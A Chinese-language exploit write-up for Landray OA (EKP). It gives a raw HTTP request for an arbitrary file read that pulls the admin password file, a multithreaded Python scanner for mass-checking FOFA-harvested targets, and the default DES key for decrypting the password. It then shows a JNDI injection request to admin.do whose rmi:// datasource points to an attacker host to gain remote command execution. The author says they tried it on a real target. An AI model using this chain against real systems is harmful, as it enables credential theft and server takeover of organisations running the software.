漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用JNDI远程命令执行获取权限FOFA
app="Landray-OA系统"漏洞过程
利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件
/WEB-INF/KmssConfig/admin.properties发送请求包
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}} 
批量检测POC编写
关键是有漏洞的网站返回包里存在“passwd”的关键字,筛选出来就行了
import requests
import argparse
from colorama import init
from colorama import Fore
import threadpool
'''
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。
攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限
'''
url_list = []
init(autoreset=True)
header = {
"User-Agent": "Go-http-client/1.1",
"Content-Length": "64",
"Content-Type": "application/x-www-form-urlencoded",
"Accept-Encoding": "gzip",
}
data = {
"var": '{"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
}
def get_response(url):
response = requests.post(url=url, headers=header, data=data, timeout=5)
if response.status_code == 200:
response.encoding = response.apparent_encoding
response.encoding = 'utf-8'
return response
else:
pass
# def open_txt():
# for ip in open("1.txt"):
# ip = ip.replace('\n', '')
# poc(url=ip)
def check_url(url):
if url.endswith("/"):
urls = url + "sys/ui/extend/varkind/custom.jsp"
else:
urls = url + '/sys/ui/extend/varkind/custom.jsp'
try:
results = get_response(urls).text
if "password" in results:
print(Fore.GREEN + "[+]存在蓝凌OA admin.do JNDI远程命令执行!!!==》\t{0}".format(url))
else:
print(Fore.RED + "[-]不存在蓝凌OA admin.do JNDI远程命令执行QAQ\t{0}".format(url))
except:
pass
# 多线程
def multithreading(url_list, pools=5):
works = []
for i in url_list:
# works.append((func_params, None))
works.append(i)
# print(works)
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(check_url, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
if __name__ == '__main__':
parser = argparse.ArgumentParser(usage='python3 poc.py -u http://xxxx\npython3 poc.py -f file.txt',
description='蓝凌OA admin.do JNDI远程命令执行漏洞检测poc')
p = parser.add_argument_group('参数')
p.add_argument("-u", "--url", type=str, help="测试单条url")
p.add_argument("-f", "--file", type=str, help="测试多条url")
args = parser.parse_args()
if args.url:
check_url(args.url)
if args.file:
for url in open(args.file, 'r'):
url = url.replace('\n', '')
url_list.append(url)
multithreading(url_list, 10)使用方法:
用fofa爬出来后,保存为txt,结果图:
加了多线程,速度也是杠杠滴
既然都到这了,就拿一个试试叭
漏洞复现
获取password后,使用 DES方法 解密,默认密钥为 kmssAdminKey
访问后台地址使用解密的密码登录
http://xxx.xxx.xxx.xxx/admin.do
使用工具执行命令
https://github.com/welk1n/JNDI-Injection-Exploit
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]运行工具监听端口 ping dnslog测试 命令执行 (蓝凌OA 默认使用的是 JDK 1.7)
POST /admin.do HTTP/1.1
Host:
Cookie: JSESSIONID=90EA764774514A566C480E9726BB3D3F; Hm_lvt_9838edd365000f753ebfdc508bf832d3=1620456866; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=1620459967
Content-Length: 70
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Origin:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
method=testDbConn&datasource=rmi://xxx.xxx.xxx.xxx:1099/cbdsdg
第一次编写POC,欢迎指出不足